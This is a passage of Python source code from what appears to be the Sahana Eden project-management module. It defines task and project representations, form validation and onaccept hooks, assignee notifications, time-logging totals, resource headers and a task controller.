table = s3db[instance_type]
r = db(table.pe_id == id).select(table.name,
limitby=(0, 1)).first()
try:
return r.name
except:
return current.messages.UNKNOWN_OPT
else:
return current.messages.UNKNOWN_OPT
# ---------------------------------------------------------------------
@staticmethod
def project_task_represent(id, row=None, show_link=True,
show_project=False):
""" FK representation """
if row:
represent = row.name
if show_project:
db = current.db
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == row.id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s (%s)" % (represent, project.name)
if show_link:
return A(represent,
_href=URL(c="project", f="task", extension="html",
args=[row.id]))
return represent
elif not id:
return current.messages["NONE"]
db = current.db
table = db.project_task
r = db(table.id == id).select(table.name,
limitby=(0, 1)).first()
try:
represent = r.name
except:
return current.messages.UNKNOWN_OPT
else:
if show_project:
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s (%s)" % (represent, project.name)
if show_link:
return A(represent,
_href=URL(c="project", f="task", extension="html",
args=[id]))
return represent
# ---------------------------------------------------------------------
@staticmethod
def project_task_represent_w_project(id, row=None):
"""
FK representation
The show_project=True in the normal represent doesn't work as a lambda in IS_ONE_OF
"""
if row:
db = current.db
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == row.id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s: %s" % (project.name, row.name)
else:
represent = represent = "- %s" % row.name
return represent
elif not id:
return current.messages["NONE"]
db = current.db
table = db.project_task
r = db(table.id == id).select(table.name,
limitby=(0, 1)).first()
try:
name = r.name
except:
return current.messages.UNKNOWN_OPT
else:
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s: %s" % (project.name, name)
else:
represent = "- %s" % name
return represent
# -------------------------------------------------------------------------
@staticmethod
def project_task_realm_entity(table, record):
""" Set the task realm entity to the project's realm entity """
task_id = record.id
db = current.db
ptable = db.project_project
ltable = db.project_task_project
query = (ltable.task_id == task_id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.realm_entity,
limitby=(0, 1)).first()
if project:
return project.realm_entity
else:
return None
# -------------------------------------------------------------------------
@staticmethod
def project_task_onvalidation(form):
""" Task form validation """
vars = form.vars
if str(vars.status) == "3" and not vars.pe_id:
form.errors.pe_id = \
current.T("Status 'assigned' requires the %(fieldname)s to not be blank") % \
dict(fieldname=current.db.project_task.pe_id.label)
elif vars.pe_id and str(vars.status) == "2":
# Set the Status to 'Assigned' if left at default 'New'
vars.status = 3
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_create_onaccept(form):
"""
When a Task is created:
* Process the additional fields: Project/Activity/Milestone
* create associated Link Table records
* notify assignee
"""
db = current.db
s3db = current.s3db
session = current.session
id = form.vars.id
if session.s3.event:
# Create a link between this Task & the active Event
etable = s3db.event_task
etable.insert(event_id=session.s3.event,
task_id=id)
ltp = db.project_task_project
vars = current.request.post_vars
project_id = vars.get("project_id", None)
if project_id:
# Create Link to Project
link_id = ltp.insert(task_id = id,
project_id = project_id)
activity_id = vars.get("activity_id", None)
if activity_id:
# Create Link to Activity
lta = db.project_task_activity
link_id = lta.insert(task_id = id,
activity_id = activity_id)
milestone_id = vars.get("milestone_id", None)
if milestone_id:
# Create Link to Milestone
ltable = db.project_task_milestone
link_id = ltable.insert(task_id = id,
milestone_id = milestone_id)
# Make sure the task is also linked to the project
# when created under an activity
row = db(ltp.task_id == id).select(ltp.project_id,
limitby=(0, 1)).first()
if not row:
lta = db.project_task_activity
ta = db.project_activity
query = (lta.task_id == id) & \
(lta.activity_id == ta.id)
row = db(query).select(ta.project_id,
limitby=(0, 1)).first()
if row and row.project_id:
ltp.insert(task_id=id,
project_id=row.project_id)
# Notify Assignee
task_notify(form)
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_update_onaccept(form):
"""
* Process the additional fields: Project/Activity/Milestone
* Log changes as comments
* If the task is assigned to someone then notify them
"""
db = current.db
s3db = current.s3db
vars = form.vars
id = vars.id
record = form.record
table = db.project_task
changed = {}
if record: # Not True for a record merger
for var in vars:
vvar = vars[var]
rvar = record[var]
if vvar != rvar:
type = table[var].type
if type == "integer" or \
type.startswith("reference"):
if vvar:
vvar = int(vvar)
if vvar == rvar:
continue
represent = table[var].represent
if not represent:
represent = lambda o: o
if rvar:
changed[var] = "%s changed from %s to %s" % \
(table[var].label, represent(rvar), represent(vvar))
else:
changed[var] = "%s changed to %s" % \
(table[var].label, represent(vvar))
if changed:
table = db.project_comment
text = s3_auth_user_represent(current.auth.user.id)
for var in changed:
text = "%s\n%s" % (text, changed[var])
table.insert(task_id=id,
body=text)
vars = current.request.post_vars
if "project_id" in vars:
ltable = db.project_task_project
filter = (ltable.task_id == id)
project = vars.project_id
if project:
# Create the link to the Project
#ptable = db.project_project
#master = s3db.resource("project_task", id=id)
#record = db(ptable.id == project).select(ptable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_project")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.project_id == project)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
project_id = project)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_project", filter=filter)
ondelete = s3db.get_config("project_task_project", "ondelete")
links.delete(ondelete=ondelete)
if "activity_id" in vars:
ltable = db.project_task_activity
filter = (ltable.task_id == id)
activity = vars.activity_id
if vars.activity_id:
# Create the link to the Activity
#atable = db.project_activity
#master = s3db.resource("project_task", id=id)
#record = db(atable.id == activity).select(atable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_activity")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.activity_id == activity)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
activity_id = activity)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_activity", filter=filter)
ondelete = s3db.get_config("project_task_activity", "ondelete")
links.delete(ondelete=ondelete)
if "milestone_id" in vars:
ltable = db.project_task_milestone
filter = (ltable.task_id == id)
milestone = vars.milestone_id
if milestone:
# Create the link to the Milestone
#mtable = db.project_milestone
#master = s3db.resource("project_task", id=id)
#record = db(mtable.id == milestone).select(mtable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_milestone")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.milestone_id == milestone)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
milestone_id = milestone)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_milestone", filter=filter)
ondelete = s3db.get_config("project_task_milestone", "ondelete")
links.delete(ondelete=ondelete)
# Notify Assignee
task_notify(form)
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_dispatch(r, **attr):
"""
Send a Task Dispatch notice from a Task
- if a location is supplied, this will be formatted as an OpenGeoSMS
"""
if r.representation == "html" and \
r.name == "task" and r.id and not r.component:
record = r.record
text = "%s: %s" % (record.name,
record.description)
# Encode the message as an OpenGeoSMS
msg = current.msg
message = msg.prepare_opengeosms(record.location_id,
code="ST",
map="google",
text=text)
# URL to redirect to after message sent
url = URL(c="project",
f="task",
args=r.id)
# Create the form
if record.pe_id:
opts = dict(recipient=record.pe_id)
else:
opts = dict(recipient_type="pr_person")
output = msg.compose(type="SMS",
message = message,
url = url,
**opts)
# Maintain RHeader for consistency
if "rheader" in attr:
rheader = attr["rheader"](r)
if rheader:
output["rheader"] = rheader
output["title"] = current.T("Send Task Notification")
current.response.view = "msg/compose.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_milestone_duplicate(item):
""" Import item de-duplication """
if item.tablename == "project_milestone":
data = item.data
table = item.table
# Duplicate if same Name & Project
if "name" in data and data.name:
query = (table.name.lower() == data.name.lower())
else:
# Nothing we can work with
return
if "project_id" in data and data.project_id:
query &= (table.project_id == data.project_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# -------------------------------------------------------------------------
@staticmethod
def project_time_onaccept(form):
""" When Time is logged, update the Task & Activity """
db = current.db
titable = db.project_time
ttable = db.project_task
atable = db.project_activity
tatable = db.project_task_activity
# Find the Task
task_id = form.vars.task_id
if not task_id:
# Component Form
query = (titable.id == form.vars.id)
record = db(query).select(titable.task_id,
limitby=(0, 1)).first()
if record:
task_id = record.task_id
# Total the Hours Logged
query = (titable.deleted == False) & \
(titable.task_id == task_id)
rows = db(query).select(titable.hours)
hours = 0
for row in rows:
if row.hours:
hours += row.hours
# Update the Task
query = (ttable.id == task_id)
db(query).update(time_actual=hours)
# Find the Activity
query = (tatable.deleted == False) & \
(tatable.task_id == task_id)
activity = db(query).select(tatable.activity_id,
limitby=(0, 1)).first()
if activity:
activity_id = activity.activity_id
# Find all Tasks in this Activity
query = (ttable.deleted == False) & \
(tatable.deleted == False) & \
(tatable.task_id == ttable.id) & \
(tatable.activity_id == activity_id)
tasks = db(query).select(ttable.time_actual)
# Total the Hours Logged
hours = 0
for task in tasks:
hours += task.time_actual or 0 # Handle None
# Update the Activity
query = (atable.id == activity_id)
db(query).update(time_actual=hours)
return
# -------------------------------------------------------------------------
@staticmethod
def project_time_effort_report(r, **attr):
"""
Provide a Report on Effort by week
@ToDo: https://sahana.mybalsamiq.com/projects/sandbox/Effort
"""
if r.representation == "html":
T = current.T
request = current.request
resource = r.resource
output = {}
from s3.s3data import S3PivotTable
rows = "person_id"
cols = "week"
layers = [("hours", "sum")]
pivot = S3PivotTable(resource, rows, cols, layers)
_table = pivot.html()
output["items"] = _table
output["title"] = T("Effort Report")
current.response.view = "list.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# =============================================================================
class S3ProjectTaskHRMModel(S3Model):
"""
Project Task HRM Model
This class holds the tables used to link Tasks to Human Resources
- either individuals or Job Roles
"""
names = ["project_task_job_title",
"project_task_human_resource",
]
def model(self):
define_table = self.define_table
task_id = self.project_task_id
# ---------------------------------------------------------------------
# Link Tasks <> Human Resources
tablename = "project_task_human_resource"
table = define_table(tablename,
task_id(),
self.hrm_human_resource_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link Tasks <> Job Roles
tablename = "project_task_job_title"
table = define_table(tablename,
task_id(),
self.hrm_job_title_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
)
# =============================================================================
class S3ProjectTaskIReportModel(S3Model):
"""
Project Task IReport Model
This class holds the table used to link Tasks with Incident Reports.
@ToDo: Link to Incidents instead?
"""
names = ["project_task_ireport",
]
def model(self):
# Link Tasks <-> Incident Reports
#
tablename = "project_task_ireport"
table = self.define_table(tablename,
self.project_task_id(),
self.irs_ireport_id(),
*s3_meta_fields())
self.configure(tablename,
onaccept=self.task_ireport_onaccept)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
)
# -------------------------------------------------------------------------
@staticmethod
def task_ireport_onaccept(form):
"""
When a Task is linked to an IReport, then populate the location_id
"""
vars = form.vars
ireport_id = vars.ireport_id
task_id = vars.task_id
db = current.db
# Check if we already have a Location for the Task
table = db.project_task
query = (table.id == task_id)
record = db(query).select(table.location_id,
limitby=(0, 1)).first()
if not record or record.location_id:
return
# Find the Incident Location
itable = db.irs_ireport
query = (itable.id == ireport_id)
record = db(query).select(itable.location_id,
limitby=(0, 1)).first()
if not record or not record.location_id:
return
location_id = record.location_id
# Update the Task
query = (table.id == task_id)
db(query).update(location_id=location_id)
return
# =============================================================================
def multi_theme_percentage_represent(id):
"""
Representation for Theme Percentages
for multiple=True options
"""
if not id:
return current.messages["NONE"]
s3db = current.s3db
table = s3db.project_theme_percentage
ttable = s3db.project_theme
def represent_row(row):
return "%s (%s%s)" % (row.project_theme.name,
row.project_theme_percentage.percentage,
"%")
if isinstance(id, (list, tuple)):
query = (table.id.belongs(id)) & \
(ttable.id == table.theme_id)
rows = current.db(query).select(table.percentage,
ttable.name)
repr = ", ".join(represent_row(row) for row in rows)
return repr
else:
query = (table.id == id) & \
(ttable.id == table.theme_id)
row = current.db(query).select(table.percentage,
ttable.name).first()
try:
return represent_row(row)
except:
return current.messages.UNKNOWN_OPT
# =============================================================================
class project_LocationRepresent(S3Represent):
""" Representation of Project Locations """
def __init__(self,
translate=False,
show_link=False,
multiple=False,
):
settings = current.deployment_settings
if settings.get_project_community():
# Community is the primary resource
self.community = True
else:
# Location is just a way to display Projects on a map
self.community = False
if settings.get_gis_countries() == 1:
self.multi_country = False
else:
self.multi_country = True
self.use_codes = settings.get_project_codes()
self.lookup_rows = self.custom_lookup_rows
super(project_LocationRepresent,
self).__init__(lookup="project_location",
show_link=show_link,
translate=translate,
multiple=multiple)
# -------------------------------------------------------------------------
def custom_lookup_rows(self, key, values, fields=None):
"""
Custom lookup method for organisation rows, does a
join with the projects and locations. Parameters
key and fields are not used, but are kept for API
compatiblity reasons.
@param values: the project_location IDs
"""
db = current.db
ltable = current.s3db.project_location
gtable = db.gis_location
fields = [ltable.id, # pkey is needed for the cache
gtable.name,
gtable.level,
gtable.L0,
gtable.L1,
gtable.L2,
gtable.L3,
gtable.L4,
gtable.L5,
]
if len(values) == 1:
query = (ltable.id == values[0]) & \
(ltable.location_id == gtable.id)
limitby = (0, 1)
else:
query = (ltable.id.belongs(values)) & \
(ltable.location_id == gtable.id)
limitby = None
if not self.community:
ptable = db.project_project
query &= (ltable.project_id == ptable.id)
fields.append(ptable.name)
if self.use_codes:
fields.append(ptable.code)
rows = db(query).select(*fields,
limitby=limitby)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the joined Row
"""
community = self.community
if not self.community:
prow = row["project_project"]
row = row["gis_location"]
name = row.name
level = row.level
if level == "L0":
location = name
else:
locations = [name]
lappend = locations.append
matched = False
L5 = row.L5
if L5:
if L5 == name:
matched = True
else:
lappend(L5)
L4 = row.L4
if L4:
if L4 == name:
if matched:
lappend(L4)
matched = True
else:
lappend(L4)
L3 = row.L3
if L3:
if L3 == name:
if matched:
lappend(L3)
matched = True
else:
lappend(L3)
L2 = row.L2
if L2:
if L2 == name:
if matched:
lappend(L2)
matched = True
else:
lappend(L2)
L1 = row.L1
if L1:
if L1 == name:
if matched:
lappend(L1)
matched = True
else:
lappend(L1)
if self.multi_country:
L0 = row.L0
if L0:
if L0 == name:
if matched:
lappend(L0)
matched = True
else:
lappend(L0)
location = ", ".join(locations)
if community:
return s3_unicode(location)
else:
if self.use_codes and prow.code:
project = "%s: %s" % (prow.code, prow.name)
else:
project = prow.name
name = "%s (%s)" % (project, location)
return s3_unicode(name)
# =============================================================================
def task_notify(form):
"""
If the task is assigned to someone then notify them
"""
vars = form.vars
pe_id = vars.pe_id
if not pe_id:
return
user = current.auth.user
if user and user.pe_id == pe_id:
# Don't notify the user when they assign themselves tasks
return
if int(vars.status) not in current.response.s3.project_task_active_statuses:
# No need to notify about closed tasks
return
if form.record is None or (int(pe_id) != form.record.pe_id):
# Assignee has changed
settings = current.deployment_settings
if settings.has_module("msg"):
# Notify assignee
subject = "%s: Task assigned to you" % settings.get_system_name_short()
url = "%s%s" % (settings.get_base_public_url(),
URL(c="project", f="task", args=vars.id))
priority = current.s3db.project_task.priority.represent(int(vars.priority))
message = "You have been assigned a Task:\n\n%s\n\n%s\n\n%s\n\n%s" % \
(url,
"%s priority" % priority,
vars.name,
vars.description or "")
current.msg.send_by_pe_id(pe_id, subject, message)
return
# =============================================================================
class S3ProjectThemeVirtualFields:
""" Virtual fields for the project table """
def themes(self):
"""
Themes associated with this Project
"""
try:
project_id = self.project_project.id
except AttributeError:
return ""
s3db = current.s3db
ptable = s3db.project_project
ttable = s3db.project_theme
ltable = s3db.project_theme_percentage
query = (ltable.deleted != True) & \
(ltable.project_id == project_id) & \
(ltable.theme_id == ttable.id)
themes = current.db(query).select(ttable.name,
ltable.percentage)
if not themes:
return current.messages["NONE"]
represent = ""
for theme in themes:
name = theme.project_theme.name
percentage = theme.project_theme_percentage.percentage
if represent:
represent = "%s, %s (%s%s)" % (represent,
name,
percentage,
"%")
else:
represent = "%s (%s%s)" % (name, percentage, "%")
return represent
# =============================================================================
# project_time virtual fields
#
def project_time_day(row):
"""
Virtual field for project_time - abbreviated string format for
date, allows grouping per day instead of the individual datetime,
used for project time report.
Requires "date" to be in the additional report_fields
@param row: the Row
"""
try:
thisdate = row["project_time.date"]
except AttributeError:
return current.messages["NONE"]
if not thisdate:
return current.messages["NONE"]
now = current.request.utcnow
week = datetime.timedelta(days=7)
#if thisdate < (now - week):
# Ignore data older than the last week
# - should already be filtered in controller anyway
# return default
return thisdate.date().strftime("%d %B %y")
# =============================================================================
def project_time_week(row):
"""
Virtual field for project_time - returns the date of the Monday
(=first day of the week) of this entry, used for project time report.
Requires "date" to be in the additional report_fields
@param row: the Row
"""
try:
thisdate = row["project_time.date"]
except AttributeError:
return current.messages["NONE"]
if not thisdate:
return current.messages["NONE"]
day = thisdate.date()
monday = day - datetime.timedelta(days=day.weekday())
return monday
# =============================================================================
def project_ckeditor():
""" Load the Project Comments JS """
s3 = current.response.s3
ckeditor = URL(c="static", f="ckeditor", args="ckeditor.js")
s3.scripts.append(ckeditor)
adapter = URL(c="static", f="ckeditor", args=["adapters", "jquery.js"])
s3.scripts.append(adapter)
# Toolbar options: http://docs.cksource.com/CKEditor_3.x/Developers_Guide/Toolbar
# @ToDo: Move to Static
js = "".join((
'''i18n.reply="''', str(current.T("Reply")), '''"
var img_path=S3.Ap.concat('/static/img/jCollapsible/')
var ck_config={toolbar:[['Bold','Italic','-','NumberedList','BulletedList','-','Link','Unlink','-','Smiley','-','Source','Maximize']],toolbarCanCollapse:false,removePlugins:'elementspath'}
function comment_reply(id){
$('#project_comment_task_id__row').hide()
$('#project_comment_task_id__row1').hide()
$('#comment-title').html(i18n.reply)
$('#project_comment_body').ckeditorGet().destroy()
$('#project_comment_body').ckeditor(ck_config)
$('#comment-form').insertAfter($('#comment-'+id))
$('#project_comment_parent').val(id)
var task_id = $('#comment-'+id).attr('task_id')
$('#project_comment_task_id').val(task_id)
}'''))
s3.js_global.append(js)
# =============================================================================
def project_rheader(r):
""" Project Resource Headers - used in Project & Budget modules """
if r.representation != "html":
# RHeaders only used in interactive views
return None
# Need to use this as otherwise demographic_data?viewing=project_location.x
# doesn't have an rheader
tablename, record = s3_rheader_resource(r)
if not record:
return None
s3db = current.s3db
table = s3db.table(tablename)
resourcename = r.name
T = current.T
auth = current.auth
settings = current.deployment_settings
attachments_label = settings.get_ui_label_attachments()
if resourcename == "project":
mode_3w = settings.get_project_mode_3w()
mode_task = settings.get_project_mode_task()
# Tabs
ADMIN = current.session.s3.system_roles.ADMIN
admin = auth.s3_has_role(ADMIN)
#staff = auth.s3_has_role("STAFF")
staff = True
tabs = [(T("Basic Details"), None)]
append = tabs.append
if settings.get_project_multiple_organisations():
append((T("Organizations"), "organisation"))
if settings.get_project_theme_percentages():
append((T("Themes"), "theme"))
if mode_3w:
if settings.get_project_community():
append((T("Communities"), "location"))
else:
append((T("Locations"), "location"))
append((T("Beneficiaries"), "beneficiary"))
if settings.get_project_milestones():
append((T("Milestones"), "milestone"))
if settings.get_project_activities():
append((T("Activities"), "activity"))
if mode_task:
append((T("Tasks"), "task"))
if record.calendar:
append((T("Calendar"), "timeline"))
if settings.get_project_multiple_budgets():
append((T("Annual Budgets"), "annual_budget"))
if mode_3w:
append((T("Documents"), "document"))
else:
append((attachments_label, "document"))
if settings.get_hrm_show_staff():
append((T("Staff"), "human_resource", dict(group="staff")))
if settings.has_module("vol"):
append((T("Volunteers"), "human_resource", dict(group="volunteer")))
rheader_fields = [["code", "name"],
["organisation_id"],
["start_date", "end_date"]
]
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename in ["location", "demographic_data"]:
tabs = [(T("Details"), None),
(T("Beneficiaries"), "beneficiary"),
(T("Demographics"), "demographic_data/"),
(T("Contact People"), "contact"),
]
rheader_fields = []
if record.project_id is not None:
rheader_fields.append(["project_id"])
rheader_fields.append(["location_id"])
rheader = S3ResourceHeader(rheader_fields, tabs)(r,
record = record,
table = table)
elif resourcename == "framework":
tabs = [(T("Details"), None),
(T("Organizations"), "organisation"),
(T("Documents"), "document")]
rheader_fields = [["name"]]
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename == "activity":
tabs = [(T("Details"), None),
(T("Contact People"), "contact")]
if settings.get_project_mode_task():
tabs.append((T("Tasks"), "task"))
tabs.append((attachments_label, "document"))
else:
tabs.append((T("Documents"), "document"))
rheader_fields = []
if record.project_id is not None:
rheader_fields.append(["project_id"])
rheader_fields.append(["name"])
rheader_fields.append(["location_id"])
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename == "task":
# Tabs
tabs = [(T("Details"), None)]
append = tabs.append
append((attachments_label, "document"))
if settings.has_module("msg"):
append((T("Notify"), "dispatch"))
#(T("Roles"), "job_title"),
#(T("Assignments"), "human_resource"),
#(T("Requests"), "req")
rheader_tabs = s3_rheader_tabs(r, tabs)
# RHeader
db = current.db
ltable = s3db.project_task_project
ptable = db.project_project
query = (ltable.deleted == False) & \
(ltable.task_id == r.id) & \
(ltable.project_id == ptable.id)
row = db(query).select(ptable.id,
ptable.code,
ptable.name,
limitby=(0, 1)).first()
if row:
project = s3db.project_project_represent(None, row)
project = TR(TH("%s: " % T("Project")),
project,
)
else:
project = ""
atable = s3db.project_activity
ltable = s3db.project_task_activity
query = (ltable.deleted == False) & \
(ltable.task_id == r.id) & \
(ltable.activity_id == atable.id)
activity = db(query).select(atable.name,
limitby=(0, 1)).first()
if activity:
activity = TR(TH("%s: " % T("Activity")),
activity.name
)
else:
activity = ""
if record.description:
description = TR(TH("%s: " % table.description.label),
record.description
)
else:
description = ""
if record.site_id:
facility = TR(TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
)
else:
facility = ""
if record.location_id:
location = TR(TH("%s: " % table.location_id.label),
table.location_id.represent(record.location_id),
)
else:
location = ""
if record.created_by:
creator = TR(TH("%s: " % T("Created By")),
s3_auth_user_represent(record.created_by),
)
else:
creator = ""
if record.time_estimated:
time_estimated = TR(TH("%s: " % table.time_estimated.label),
record.time_estimated
)
else:
time_estimated = ""
if record.time_actual:
time_actual = TR(TH("%s: " % table.time_actual.label),
record.time_actual
)
else:
time_actual = ""
rheader = DIV(TABLE(project,
activity,
TR(TH("%s: " % table.name.label),
record.name,
),
description,
facility,
location,
creator,
time_estimated,
time_actual,
#comments,
), rheader_tabs)
return rheader
# =============================================================================
def project_task_form_inject(r, output, project=True):
"""
Inject Project, Activity & Milestone fields into a Task form
@ToDo: Re-implement using http://eden.sahanafoundation.org/wiki/S3SQLForm
"""
T = current.T
db = current.db
s3db = current.s3db
auth = current.auth
s3 = current.response.s3
settings = current.deployment_settings
sep = ": "
s3_formstyle = settings.get_ui_formstyle()
table = s3db.project_task_activity
field = table.activity_id
default = None
if r.component_id:
query = (table.task_id == r.component_id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.activity_id
elif r.id:
query = (table.task_id == r.id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.activity_id
if not default:
default = field.default
field_id = "%s_%s" % (table._tablename, field.name)
if r.component:
requires = {}
table = db.project_activity
query = (table.project_id == r.id)
rows = db(query).select(table.id, table.name)
for row in rows:
requires[row.id] = row.name
field.requires = IS_IN_SET(requires)
else:
if default:
field.requires = IS_IN_SET([default])
else:
field.requires = IS_IN_SET([])
widget = SQLFORM.widgets.options.widget(field, default)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = S3AddResourceLink(T("Add Activity"),
c="project",
f="activity",
tooltip=T("If you don't see the activity in the list, you can add a new one by clicking link 'Add Activity'."))
if project:
options = {"triggerName": "project_id",
"targetName": "activity_id",
"lookupPrefix": "project",
"lookupResource": "activity",
"optional": True,
}
s3.jquery_ready.append('''S3OptionsFilter(%s)''' % json.dumps(options))
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(0, row[1])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(0, row[0])
except:
pass
# Milestones
if settings.get_project_milestones():
table = s3db.project_task_milestone
field = table.milestone_id
if project and r.id:
query = (table.task_id == r.id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.milestone_id
else:
default = field.default
field_id = "%s_%s" % (table._tablename, field.name)
# Options will be added later based on the Project
if default:
field.requires = IS_IN_SET({default:field.represent(default)})
else:
field.requires = IS_IN_SET([])
#widget = SELECT(_id=field_id, _name=field.name)
widget = SQLFORM.widgets.options.widget(field, default)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = S3AddResourceLink(T("Add Milestone"),
c="project",
f="milestone",
tooltip=T("If you don't see the milestone in the list, you can add a new one by clicking link 'Add Milestone'."))
options = {"triggerName": "project_id",
"targetName": "milestone_id",
"lookupPrefix": "project",
"lookupResource": "milestone",
"optional": True,
}
s3.jquery_ready.append('''S3OptionsFilter(%s)''' % json.dumps(options))
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(14, row[1])
output["form"][0].insert(14, row[0])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(7, row[0])
except:
pass
if project:
vars = current.request.get_vars
if "project" in vars:
widget = INPUT(value=vars.project, _name="project_id")
row = s3_formstyle("project_task_project__row", "",
widget, "", hidden=True)
else:
table = s3db.project_task_project
field = table.project_id
if r.id:
query = (table.task_id == r.id)
default = db(query).select(table.project_id,
limitby=(0, 1)).first()
if default:
default = default.project_id
else:
default = field.default
widget = field.widget or SQLFORM.widgets.options.widget(field, default)
field_id = "%s_%s" % (table._tablename, field.name)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = field.comment if auth.s3_has_role("STAFF") else ""
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(0, row[1])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(0, row[0])
except:
pass
return output
# =============================================================================
def project_task_controller():
"""
Tasks Controller, defined in the model for use from
multiple controllers for unified menus
"""
T = current.T
s3db = current.s3db
auth = current.auth
s3 = current.response.s3
vars = current.request.get_vars
# Pre-process
def prep(r):
tablename = "project_task"
table = s3db.project_task
statuses = s3.project_task_active_statuses
crud_strings = s3.crud_strings[tablename]
if r.record:
if r.interactive:
# Put the Comments in the RFooter
project_ckeditor()
s3.rfooter = LOAD("project", "comments.load",
args=[r.id],
ajax=True)
elif "mine" in vars:
# Show the Open Tasks for this User
if auth.user:
pe_id = auth.user.pe_id
s3.filter = (table.pe_id == pe_id) & \
(table.status.belongs(statuses))
crud_strings.title_list = T("My Open Tasks")
crud_strings.msg_list_empty = T("No Tasks Assigned")
s3db.configure(tablename,
copyable=False,
listadd=False)
try:
# Add Project
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(4, (T("Project"), "task_project.project_id"))
# Hide the Assignee column (always us)
list_fields.remove("pe_id")
# Hide the Status column (always 'assigned' or 'reopened')
list_fields.remove("status")
s3db.configure(tablename,
list_fields=list_fields)
except:
pass
elif "project" in vars:
# Show Open Tasks for this Project
project = vars.project
ptable = s3db.project_project
try:
name = current.db(ptable.id == project).select(ptable.name,
limitby=(0, 1)).first().name
except:
current.session.error = T("Project not Found")
redirect(URL(args=None, vars=None))
if r.method == "search":
# @ToDo: get working
r.get_vars = {"task_search_project": name,
"task_search_status": ",".join([str(status) for status in statuses])
}
else:
ltable = s3db.project_task_project
s3.filter = (ltable.project_id == project) & \
(ltable.task_id == table.id) & \
(table.status.belongs(statuses))
crud_strings.title_list = T("Open Tasks for %(project)s") % dict(project=name)
crud_strings.title_search = T("Search Open Tasks for %(project)s") % dict(project=name)
crud_strings.msg_list_empty = T("No Open Tasks for %(project)s") % dict(project=name)
# Add Activity
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(2, (T("Activity"), "task_activity.activity_id"))
s3db.configure(tablename,
# Block Add until we get the injectable component lookups
insertable=False,
deletable=False,
copyable=False,
list_fields=list_fields)
elif "open" in vars:
# Show Only Open Tasks
crud_strings.title_list = T("All Open Tasks")
s3.filter = (table.status.belongs(statuses))
else:
crud_strings.title_list = T("All Tasks")
crud_strings.title_search = T("All Tasks")
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(3, (T("Project"), "task_project.project_id"))
list_fields.insert(4, (T("Activity"), "task_activity.activity_id"))
if r.component:
if r.component_name == "req":
if current.deployment_settings.has_module("hrm"):
r.component.table.type.default = 3
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
s3db.req_create_form_mods()
elif r.component_name == "human_resource":
r.component.table.type.default = 2
else:
if not auth.s3_has_role("STAFF"):
# Hide fields to avoid confusion (both of inputters & recipients)
table = r.table
field = table.time_actual
field.readable = field.writable = False
return True
